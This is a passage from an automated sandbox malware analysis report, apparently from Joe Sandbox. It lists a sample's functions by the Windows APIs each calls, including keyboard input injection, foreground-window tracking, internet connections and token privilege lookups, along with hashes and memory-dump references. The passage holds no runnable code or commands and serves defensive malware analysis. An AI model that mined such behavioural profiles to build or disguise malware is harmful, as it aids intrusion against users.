                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008F6D58
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6D64
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLast$__itow__swprintfsocket
                              • String ID:
                              • API String ID: 2214342067-0
                              • Opcode ID: 40c69bf9b618dffa9910bb2bb5a9d90a5e91c990e7768e66838a1f2728dd3dea
                              • Instruction ID: 26d49cbcd5b8977d0cab167b0b1206f130cbbd682672ef5319b51ec61fb6d99d
                              • Opcode Fuzzy Hash: 40c69bf9b618dffa9910bb2bb5a9d90a5e91c990e7768e66838a1f2728dd3dea
                              • Instruction Fuzzy Hash: 3A418275740214AFEB20BF28DC86F3A77A5FB04B14F448118FA59DB2D2DA719D008792
                              Function 008F672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0090F910), ref: 008F67BA
                              • _strlen.LIBCMT ref: 008F67EC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID:
                              • API String ID: 4218353326-0
                              • Opcode ID: 93158b7c9752d07268967d3fb9c3b70d9a392b93f0fdbf97471b6b3fe7842e6e
                              • Instruction ID: ae816a4459fc314c627d5e0733df46640ed19f62839e5735fceb92688d356da0
                              • Opcode Fuzzy Hash: 93158b7c9752d07268967d3fb9c3b70d9a392b93f0fdbf97471b6b3fe7842e6e
                              • Instruction Fuzzy Hash: D1416D35A00108ABCB14FB68DCD5EBEB7A9FF48354F148269F916D7292EB30AD50C752
                              Function 008EBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008EBB09
                              • GetLastError.KERNEL32(?,00000000), ref: 008EBB2F
                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008EBB54
                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008EBB80
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateHardLink$DeleteErrorFileLast
                              • String ID:
                              • API String ID: 3321077145-0
                              • Opcode ID: bfd0c51ce59400e3edf534f3732c1106d98cb168cc5a6a0930de8c7eceea0097
                              • Instruction ID: c72f123d8b3b029387caa2d040420a180838b137db17f9b9c22e6f262cb84f25
                              • Opcode Fuzzy Hash: bfd0c51ce59400e3edf534f3732c1106d98cb168cc5a6a0930de8c7eceea0097
                              • Instruction Fuzzy Hash: 4E410C35200550DFCF11EF19C585A6DBBE1FF89320B198498E88A9B762CB34FD01DB92
                              Function 00908AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                              Download Yara Rule
                              APIs
                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00908B4D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InvalidateRect
                              • String ID:
                              • API String ID: 634782764-0
                              • Opcode ID: cbd04df267877613ee6c092af6c72fd644246147fd8b1204807e28589a2b1cc4
                              • Instruction ID: 161aa11d557fb4c0e04ff42c2cf03dcc65c46c39e9b17a3530e896a19f5d8ee7
                              • Opcode Fuzzy Hash: cbd04df267877613ee6c092af6c72fd644246147fd8b1204807e28589a2b1cc4
                              • Instruction Fuzzy Hash: FF31B2B4704208BEEB209E58CC55FAB3BA8EB06320F244912FAD1D66E1DE35A9809751
                              Function 0090ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                              Download Yara Rule
                              APIs
                              • ClientToScreen.USER32(?,?), ref: 0090AE1A
                              • GetWindowRect.USER32(?,?), ref: 0090AE90
                              • PtInRect.USER32(?,?,0090C304), ref: 0090AEA0
                              • MessageBeep.USER32(00000000), ref: 0090AF11
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Rect$BeepClientMessageScreenWindow
                              • String ID:
                              • API String ID: 1352109105-0
                              • Opcode ID: 555572d0bb694ef8e5d53c52b8b13626eaf57a585240810f2e8120c277fac674
                              • Instruction ID: 98d6ed2f581c7f0713b02b92f5f885efde66ed98d800e8eea619eeaafc0747e3
                              • Opcode Fuzzy Hash: 555572d0bb694ef8e5d53c52b8b13626eaf57a585240810f2e8120c277fac674
                              • Instruction Fuzzy Hash: 5F416C7460431ADFCB11CF58C884FA9BBF9FB8A350F2481A9E9149B391D731A941DF92
                              Function 008E0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008E1037
                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 008E1053
                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008E10B9
                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008E110B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: KeyboardState$InputMessagePostSend
                              • String ID:
                              • API String ID: 432972143-0
                              • Opcode ID: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                              • Instruction ID: 75c8f80727f65f1e7e34a2d98de4870d78c41836816b7ba4ee1f69d3f74e359a
                              • Opcode Fuzzy Hash: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                              • Instruction Fuzzy Hash: 3D313930E44AC8AEFF308A6B8C0DBF9BBA9FB46314F04421AF591D25D1C77589C49752
                              Function 008E1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 008E1176
                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 008E1192
                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 008E11F1
                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 008E1243
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: KeyboardState$InputMessagePostSend
                              • String ID:
                              • API String ID: 432972143-0
                              • Opcode ID: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                              • Instruction ID: a2ca438e41220570089a4e85a056552b6a92a9a844d6f63d879e2ba883f462b9
                              • Opcode Fuzzy Hash: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                              • Instruction Fuzzy Hash: 23314630A4428CAEEF30CA6B8C0C7FABBAAFB4A310F04531BF281D21D1C3744A849751
                              Function 008B6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B644B
                              • __isleadbyte_l.LIBCMT ref: 008B6479
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B64A7
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B64DD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: c4840d1bc78d81c28a62f29abd9adbe8d711ff94fe7b1b9a34f9e27a1310ebb8
                              • Instruction ID: c85f22d8505feda288e1d4d6b5d7e97d330e898232b0d6683a31c9425dc23b5e
                              • Opcode Fuzzy Hash: c4840d1bc78d81c28a62f29abd9adbe8d711ff94fe7b1b9a34f9e27a1310ebb8
                              • Instruction Fuzzy Hash: DD31E131600A4AEFDB218F64C844BFA7BA5FF41310F154429F864C72A0FB39D860DB94
                              Function 00905175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32 ref: 00905189
                                • Part of subcall function 008E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008E3897
                                • Part of subcall function 008E387D: GetCurrentThreadId.KERNEL32 ref: 008E389E
                                • Part of subcall function 008E387D: AttachThreadInput.USER32(00000000,?,008E52A7), ref: 008E38A5
                              • GetCaretPos.USER32(?), ref: 0090519A
                              • ClientToScreen.USER32(00000000,?), ref: 009051D5
                              • GetForegroundWindow.USER32 ref: 009051DB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                              • String ID:
                              • API String ID: 2759813231-0
                              • Opcode ID: dfabd2ce9797d4e4dd917f2fc15665d78ad6af0e0359be731172243d87efc743
                              • Instruction ID: c5f217f372427994a0c9aac5a9d78d2a7c7f7cb039466993d47631b7383e6b65
                              • Opcode Fuzzy Hash: dfabd2ce9797d4e4dd917f2fc15665d78ad6af0e0359be731172243d87efc743
                              • Instruction Fuzzy Hash: DA312C71900118AFDB14EFA9C885DEFB7F9FF98300F14406AE856E7241EA759E05CBA1
                              Function 0090C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • GetCursorPos.USER32(?), ref: 0090C7C2
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008BBBFB,?,?,?,?,?), ref: 0090C7D7
                              • GetCursorPos.USER32(?), ref: 0090C824
                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008BBBFB,?,?,?), ref: 0090C85E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                              • String ID:
                              • API String ID: 2864067406-0
                              • Opcode ID: cdfd7b434c3e1914768720d698f6f3d153ce3a97faf7588c591b073a8e033648
                              • Instruction ID: b22ce8627c4a416aca894e493d5f774d3a599564d6a03dd1fb409bf7a282b5b9
                              • Opcode Fuzzy Hash: cdfd7b434c3e1914768720d698f6f3d153ce3a97faf7588c591b073a8e033648
                              • Instruction Fuzzy Hash: 7E317175600118BFCB25CF58CC98EEA7BBAEF4A710F048169F9058B2A1D7319D50EB65
                              Function 008D8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8669
                                • Part of subcall function 008D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D8673
                                • Part of subcall function 008D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8682
                                • Part of subcall function 008D8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8689
                                • Part of subcall function 008D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D869F
                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008D8BEB
                              • _memcmp.LIBCMT ref: 008D8C0E
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008D8C44
                              • HeapFree.KERNEL32(00000000), ref: 008D8C4B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                              • String ID:
                              • API String ID: 1592001646-0
                              • Opcode ID: e219040d0a797f6b3d04f361141fabf8e8f92a1b59b61aecdd08d752cd560c30
                              • Instruction ID: 70534f6a569ab1ac1131e955a27f8b21cd8c269dc11c45aede5afdd722363a5b
                              • Opcode Fuzzy Hash: e219040d0a797f6b3d04f361141fabf8e8f92a1b59b61aecdd08d752cd560c30
                              • Instruction Fuzzy Hash: 6E217A71E11208EFDB10DFA4C949BEEB7B8FF44354F14419AE554E7240EB31AA46DB60
                              Function 008A0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                              Download Yara Rule
                              APIs
                              • __setmode.LIBCMT ref: 008A0BF2
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                              • _fprintf.LIBCMT ref: 008A0C29
                              • OutputDebugStringW.KERNEL32(?), ref: 008D6331
                                • Part of subcall function 008A4CDA: _flsall.LIBCMT ref: 008A4CF3
                              • __setmode.LIBCMT ref: 008A0C5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                              • String ID:
                              • API String ID: 521402451-0
                              • Opcode ID: 5845712218e182f203de9a38420b0205366fb45af7d229e8177eaedbf14787ea
                              • Instruction ID: c12aeb22a6cc1338f43fc80373da2a28f0d81c60ef5cd1e356817924878b0c3b
                              • Opcode Fuzzy Hash: 5845712218e182f203de9a38420b0205366fb45af7d229e8177eaedbf14787ea
                              • Instruction Fuzzy Hash: 991105319042087FEB04B7BC9C429BE7B69FF82320F14011AF205D7692DEA15D525793
                              Function 008F1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008F1A97
                                • Part of subcall function 008F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008F1B40
                                • Part of subcall function 008F1B21: InternetCloseHandle.WININET(00000000), ref: 008F1BDD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Internet$CloseConnectHandleOpen
                              • String ID:
                              • API String ID: 1463438336-0
                              • Opcode ID: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                              • Instruction ID: ca79a5d18ae81746b48762dda67a7a6e581c110a61f923f9a1d80fd760333ab8
                              • Opcode Fuzzy Hash: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                              • Instruction Fuzzy Hash: C1219F35204609FFDB229F748C09FBAB7A9FF88711F10001AFB11E6651EB719911ABA1
                              Function 008DE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008DE1C4,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?), ref: 008DF5BC
                                • Part of subcall function 008DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 008DF5E2
                                • Part of subcall function 008DF5AD: lstrcmpiW.KERNEL32(00000000,?,008DE1C4,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?), ref: 008DF613
                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008DE1DD
                              • lstrcpyW.KERNEL32(00000000,?), ref: 008DE203
                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,008DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008DE237
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: lstrcmpilstrcpylstrlen
                              • String ID: cdecl
                              • API String ID: 4031866154-3896280584
                              • Opcode ID: fb08823b5110c37ad347da4d5c1360f70adbcecc5e9fe2f2581e294008987477
                              • Instruction ID: 9fa40c9264cad39540348ce82192fa52ec510544e985854517dba38c5c813325
                              • Opcode Fuzzy Hash: fb08823b5110c37ad347da4d5c1360f70adbcecc5e9fe2f2581e294008987477
                              • Instruction Fuzzy Hash: C211BE36204305EFCB25AF68DC45A7A77B9FF85350B40422BF816CB2A0EB71A95097A1
                              Function 008B5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 008B5351
                                • Part of subcall function 008A594C: __FF_MSGBANNER.LIBCMT ref: 008A5963
                                • Part of subcall function 008A594C: __NMSG_WRITE.LIBCMT ref: 008A596A
                                • Part of subcall function 008A594C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000000,?,?,?,008A1013,?), ref: 008A598F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocateHeap_free
                              • String ID:
                              • API String ID: 614378929-0
                              • Opcode ID: 2c918ee8c5caac0e7366385b2455afb3325a6dcb0603df7a4ef1d6a001a9413b
                              • Instruction ID: 13218e2f43c44f77920037b5f8315c31ae2303cb6df1a35ccaa654e44aad8444
                              • Opcode Fuzzy Hash: 2c918ee8c5caac0e7366385b2455afb3325a6dcb0603df7a4ef1d6a001a9413b
                              • Instruction Fuzzy Hash: 1D11C432908A15AEDB312F78AC1579E37D4FF1B3E0B200429F904DA791DFB589409751
                              Function 00884531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 00884560
                                • Part of subcall function 0088410D: _memset.LIBCMT ref: 0088418D
                                • Part of subcall function 0088410D: _wcscpy.LIBCMT ref: 008841E1
                                • Part of subcall function 0088410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008841F1
                              • KillTimer.USER32(?,00000001,?,?), ref: 008845B5
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008845C4
                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008BD6CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
